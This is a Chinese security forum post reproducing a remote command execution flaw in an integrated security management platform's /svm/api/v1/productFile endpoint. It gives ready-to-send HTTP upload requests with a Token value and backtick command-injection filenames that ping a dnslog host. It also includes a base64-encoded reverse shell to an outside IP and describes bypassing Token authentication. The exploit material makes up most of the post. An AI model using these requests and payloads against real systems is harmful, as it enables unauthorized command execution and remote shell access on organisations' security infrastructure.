设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 漏洞复现 综合安防管理平台 _svm_api_v1_productFile 远 ...
返回列表 发新帖
查看: 456|回复: 0

漏洞复现 综合安防管理平台 _svm_api_v1_productFile 远程命令执...

[复制链接]
tna

36

主题

36

帖子

120

积分

注册会员

Rank: 2

积分
120
发表于 2024-6-12 19:14:03 | 显示全部楼层 |阅读模式
漏洞细节





直接可以上传webshell,但是这里有一个Token鉴权

我们需要看这个Token的生成算法

对应的是so文件,我们来进行ida逆向分析

直接看sub_35690函数即可,
   

这里主要看v8大于等于0的函数即可,这里我就懒得看了

复现

数据包

POST /svm/api/v1/productFile?type=product&ip=127.0.0.1&agentNo=1 HTTP/1.1
Host:
Token: SElLIElnVTBzNVd6eWlibVB4M046dUE0SlBBbGJTWGNMUnk5aWg4dkJXL2RjeEdqKys4aTd0cHBMM09INytVZz0=
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Length: 566
Content-Type: multipart/form-data; boundary=------------------------LOHhVTVvcAweFijvGOVJEnTJWjEQDyVdzQtdtDcx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

--------------------------LOHhVTVvcAweFijvGOVJEnTJWjEQDyVdzQtdtDcx
Content-Disposition: form-data; name="file";filename="z.zip"

{{file(/Users/zhizhuo/Desktop/tools/目录穿越zip生成器/z.zip)}}
--------------------------LOHhVTVvcAweFijvGOVJEnTJWjEQDyVdzQtdtDcx--

没打成功,回头在细梭一边代码,发现最终RCE的地方并不是文件上传,而是文件名字

"`open -na Calculator`.zip"
"`ping xxx.dnslog.cn`.zip"
# 反弹shell
"echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzkwOTkgMD4mMQ== | base64 -d"

文件名字不能有 / 这TM直接就不能写webshell,看起来只能无回显利用

数据包

POST /svm/api/v1/productFile?type=product&ip=127.0.0.1&agentNo=1 HTTP/1.1
Host:
Token: SElLIElnVTBzNVd6eWlibVB4M046dUE0SlBBbGJTWGNMUnk5aWg4dkJXL2RjeEdqKys4aTd0cHBMM09INytVZz0=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary =---------------------------142851345723692939351758052805
Content-Length: 346

-----------------------------142851345723692939351758052805
Content-Disposition: form-data; name="file"; filename="`ping xxx.dnslog.cn`.zip"
Content-Type: application/zip

123
-----------------------------142851345723692939351758052805--

Token生成

在@Y4tacker 的指导下完成了整个token获取后台变前台(二进制的算法被Y5割了2个月没给我)

对于除了/static/外的路径都会经过验证Token

如果传入的Token没有通过验证的话,那么就会生成一个新的Token返回,下面找到访问控制器就可以了

获取Token





本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-27 23:35 , Processed in 0.014023 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表